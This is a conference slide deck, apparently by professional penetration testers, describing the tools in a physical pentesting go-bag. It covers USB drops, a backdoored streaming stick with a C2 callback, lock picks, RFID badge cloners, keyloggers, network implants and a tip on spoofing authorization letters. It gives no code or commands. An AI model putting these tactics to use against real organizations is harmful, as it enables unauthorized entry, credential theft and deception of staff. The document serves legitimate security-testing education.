Build Your Own Physical Pentesting Go-Bag

Beau Bullock - @dafthackDerek Banks - @0xderuke

Overview• Attackers commonly try attacking

organizations remotely first• Phishing Attacks• Exploiting vulnerabilities in

externally facing systems• External credential dumps• Etc.

• If these fail, physical attacks are required

Overview• Having the right tools in the

physical attack toolkit can determine success or failure• Simply “getting in” is not enough• What happens after one is inside

an organization can make or break an operation• We wanted to share what our

physical pentesting go-bags look like

About Us• Pentesters at Black Hills

Information Security• Have a number of SANS and

OffSec certs…• CitySec Meetup Organizers• CigarCitySec – (Tampa, FL)• CitrusSec – (Orlando, FL• TidewaterSec – (Poquoson, VA)

• Avid OWA enthusiasts

Go-BagWhere are we storing our gear?

Choose a Quality Bag• Totally a personal preference• Weatherproofing • GoRuck bags are top notch (but a bit expensive)• Built in USA• Scars Lifetime Guarantee

• Must comfortably hold all the gear

“Remote” Physical AttacksSometimes, devices can make their way into organizations

USB Drop• Most employees are “very

concerned” with things like budgets and payroll• Dropping USB’s with “sensitive

data” in a parking lot gets shells• Macro-enabled docs and

spreadsheets are still king• We are fans on PowerShell

Empire payloads

Backdoored Streaming Media Devices• People enjoy gifts• Streaming media devices require

Internet• Corp WiFi networks seem to be a

good place to plugin new gifts• So, I backdoored an Amazon Fire

Stick• It calls back to a C2 server

providing a remote shell

Wireless HackingCan we attack the network over wireless frequencies?

Wireless Gear• Alfa Cards (AWUS036H)• Yagi Antenna• Ubertooth One• WiFi Pineapple• HackRF One • Etc.

Gaining AccessPhysical Exploitation Methods

Get-Out-of-Jail-Free Card• Probably the most important

thing.• Needed to ensure your

authorized pentest doesn’t land you in jail• But, you can spoof these too• Change security contact info to

someone on your team

Social Engineering• Simply walking into buildings works sometimes• The printer really needs paper…

• Having a good ruse is key though• Tailgating• Just knocking• Seriously, this has worked for me.

• Much more in depth topic than can be covered quickly

Lock Picks• Having a good set of lock picks is

a must• Some quality brands:• Sparrows• SouthOrd• Toool

• Practice, practice, practice• Shims

Bypassing Devices• Compressed Air• Under the Door Tool• Credit card trick• Whiskey• Etc.

RFID Cloning• Misplaced belief in the security of RFID access control• Many types of RFID access devices and protocols• Can be confusing getting started

• Field usable cloning device examples:• BLEKey• ESPKey• Proxmark3• Bishop Fox Tastic RFID Theif

RFID Access Control• Consists of a reader that energizes a tag that returns a signal • Return signal contains encoded information over a protocol• Common RFID Frequencies • Low Frequency (LF) – 125KHz

• HID Prox, EM• High Frequency (HF) – 13.56 MHz

• MiFare, HID iClass

• Wiegand most common format

BLEKey• Physical tap for the Wiegand protocol• Presented at BlackHat 2015• Uses Bluetooth Low Energy to communicate• Sniffed data can be offloaded to an app• App can replay signal granting access

https://github.com/linklayer/BLEKey

ESPKey• Physical tap that communicates over WiFi• Presented at Shmoocon 2017• Implantable Logic Analyzers and Unlocking Doors – Kenny McElroy

• Stands up WiFi hot spot and has a web interface• Draws power from the card reader• Not quite for sale yet…

https://archive.org/details/ShmooCon2017

Proxmark3 RDV2 Kit• Portable RFID sniffing/reading/cloning• Pretend to be a reader or a tag

• Both LF and HF antennae included• Need to be relatively close to badge

• Can be operated on battery or be powered via USB• Works with Kali NetHunter

Bishop Fox Tastic• Long range RFID reader• On your own to replay to card reader

• Targets 125KHz systems such as HID Prox and Indala Prox• Code and parts list available for free online• Uses Arduino and long range card reader

https://www.bishopfox.com/resources/tools/rfid-hacking/attack-tools/

Post Access ExploitationYou’re in. Now what?

Pentest Dropbox• Fully functional pentesting device• Persistent reverse SSH tunnel• Can be controlled over WiFi• Relatively unnoticeable• ODROID-C2 build instructions

here: • http://

www.blackhillsinfosec.com/?p=5156

NAC Bypass Device• Layer 2 and 3 NAT – Helps avoid

triggering port security rules on 802.1X• Insert “between” wall and valid

system• Device spoofs both sides of wire• Passively learns MAC addresses• Current build is a Beaglebone

Black

Kon-Boot• Bypass authentication on many

systems• Boot to Kon-boot USB or CD• After getting in you could:• Dump local hashes• Add a new admin user• Get a shell

• Doesn’t work on encrypted HD’s

Wi-Fi Keylogger• Insert between keyboard and PC• Connects to an AP specified by us• Retrieve keys from LAN

connection• Can email a report every hour• Keys are stored locally as well• 4 GB of storage• Hardly noticeable

PoisonTap• Emulates an Ethernet device over

USB• Intercepts all Internet traffic• Is able to sniff HTTP cookies and

sessions from the browser• Can be used• Can be used on a locked machine

LAN Turtle• “Generic Housing” USB Device that out of the box that provides• Remote Access• Network Intelligence• Man-in-the Middle Monitoring

• Community Module Framework • Credential grabbing from locked computer• Thanks @mubix!

HID Attack – Rubber Ducky• USB Human Interface Device (HID) Keyboard Injection Attack Platform• From HAK5’s Hakshop

• Takes advantage of inherent trust of connected keyboard devices• Payloads in the form of scripts then encoded to SD card• Pre-configured payloads available

• Works on most platform

Kali NetHunter• Kali Linux on a mobile device • Android ROM Overlay• Builds available for Nexus, OnePlus, as well other devices• Chroot environment with multiple options from minimal to full Kali installs

• HID Attacks (DuckHunter)• MANA Evil Access Point• BadUSB Attacks• Cost – Variable

Kali NetHunter(Ducky HID Attack)

DEMO!

Conclusion

• There’s a lot more to compromising an organization than just getting in the door… And there is usually more than one door.• Preparing for different situations before going on-site is a must.• Include tools in your go-bag to help you succeed in each scenario.• One last tip: • Do recon on the target location prior to getting there. Use Google maps to

locate entrances; Use Wigle to determine possible WiFi SSIDs.

Gear List• GoRuck bag• Get-Out-of-Jail-Free Card• “Remote” Physical Attack Tools

• USB’s for USB drop• Backdoored Amazon Fire Stick

• Wireless Gear• Alfa Cards (AWUS036H)• Yagi Antenna• Ubertooth One• WiFi Pineapple• HackRF One

• Physical Exploitation Tools• Lock Picks• Compressed Air• Under the Door Tool

• Badge Cloning Devices• Proxmark3 RDV2• BLEKey• ESPKey• Bishop Fox Tastic RFID Thief

• Post-Access Exploitation• Pentest Dropbox• NAC Bypass Device• Kon-Boot• Wi-Fi Keylogger• PoisonTap• LAN Turtles• Rubber Duckys

• Post-Access Exploitation Cont.• Kali Nethunter

• Laptop• Additional Tools

• Powered Screwdriver

• Flashlight• Cat-5 Cables• Battery Packs for mobile devices• USB On-The-Go Cable• Throwing star LAN Tap (or real

throwing stars)

Summary and Conclusions• Black Hills Information Security• http://www.blackhillsinfosec.com/• @BHInfoSecurity

• Beau Bullock @dafthack• Derek Banks @0xderuke

• Questions?